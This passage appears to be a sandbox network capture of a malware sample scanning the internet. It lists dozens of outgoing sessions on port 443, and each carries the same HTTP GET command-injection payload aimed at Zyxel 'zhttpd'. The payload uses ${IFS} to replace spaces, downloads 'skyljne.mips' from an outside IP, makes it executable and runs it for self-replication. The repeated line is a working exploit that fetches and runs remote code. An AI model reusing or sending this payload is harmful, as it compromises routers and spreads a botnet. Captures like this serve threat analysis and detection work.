                                            Jan 14, 2024 15:50:25.188654900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            615192.168.2.2349264119.170.217.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188688040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            616192.168.2.233551236.199.208.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188720942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            617192.168.2.235798263.120.113.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188741922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            618192.168.2.233343068.170.248.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188775063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            619192.168.2.234300413.195.121.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188811064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            620192.168.2.2338506106.0.219.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188852072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            621192.168.2.235527095.109.32.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188868046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            622192.168.2.2335994188.117.154.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188883066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            623192.168.2.233681052.212.210.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188911915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            624192.168.2.2338812134.166.225.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188987017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            625192.168.2.2355916209.82.12.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189008951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            626192.168.2.2359492169.63.58.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189048052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            627192.168.2.2332790177.30.98.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189071894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            628192.168.2.2345860162.144.201.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189097881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            629192.168.2.233482696.87.209.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189102888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            630192.168.2.2333904107.103.4.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189138889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            631192.168.2.2339850190.104.236.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189177990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            632192.168.2.2341474208.135.133.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189203978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            633192.168.2.234951281.87.58.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189210892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            634192.168.2.235329468.39.64.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189244032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            635192.168.2.233590262.74.124.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189297915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            636192.168.2.235736865.72.69.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189318895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            637192.168.2.235825620.152.244.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189383030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            638192.168.2.2354902139.169.145.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189404964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            639192.168.2.235847239.61.113.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189430952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            640192.168.2.234970481.180.137.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189430952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            641192.168.2.2347368126.235.142.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189455032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            642192.168.2.2342218184.138.135.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189498901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            643192.168.2.2357912143.253.163.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189522028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            644192.168.2.2346050129.210.144.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189546108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            645192.168.2.2344000179.102.131.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189595938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            646192.168.2.2356514164.43.91.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189606905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            647192.168.2.2340930136.193.71.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189626932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            648192.168.2.2353142149.59.33.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189644098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            649192.168.2.2349850104.24.4.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189671040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            650192.168.2.2352882160.112.112.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189713955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            651192.168.2.233791091.229.111.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189716101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            652192.168.2.2333594156.150.105.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189766884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            653192.168.2.235695695.27.119.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189789057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            654192.168.2.2356536197.28.207.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.189831972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            655192.168.2.235344447.24.69.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194667101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            656192.168.2.2354148122.173.151.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194703102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            657192.168.2.2344718109.67.214.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194761038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            658192.168.2.2360640145.21.121.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194762945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            659192.168.2.2345880108.100.191.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194762945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            660192.168.2.2352704120.225.98.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194782972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            661192.168.2.2352736210.52.65.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.194812059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            662192.168.2.234152671.90.120.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198616982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            663192.168.2.2339332123.230.176.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            664192.168.2.235626268.243.188.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198657036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            665192.168.2.233753075.15.76.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198681116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            666192.168.2.235173461.81.237.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198693991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            667192.168.2.2350100157.194.167.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198720932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            668192.168.2.233697276.86.181.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198729038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            669192.168.2.2355246135.104.155.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198751926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            670192.168.2.2358414132.96.144.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198771000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            671192.168.2.2357280110.29.43.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198800087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            672192.168.2.2351778206.62.64.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198837996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            673192.168.2.2358308161.30.16.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198859930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            674192.168.2.2354562180.93.156.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198889971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            675192.168.2.2332820218.187.159.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198923111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            676192.168.2.234692086.22.198.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.198972940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            677192.168.2.233538080.51.52.109443
                                            TimestampBytes transferredDirectionData
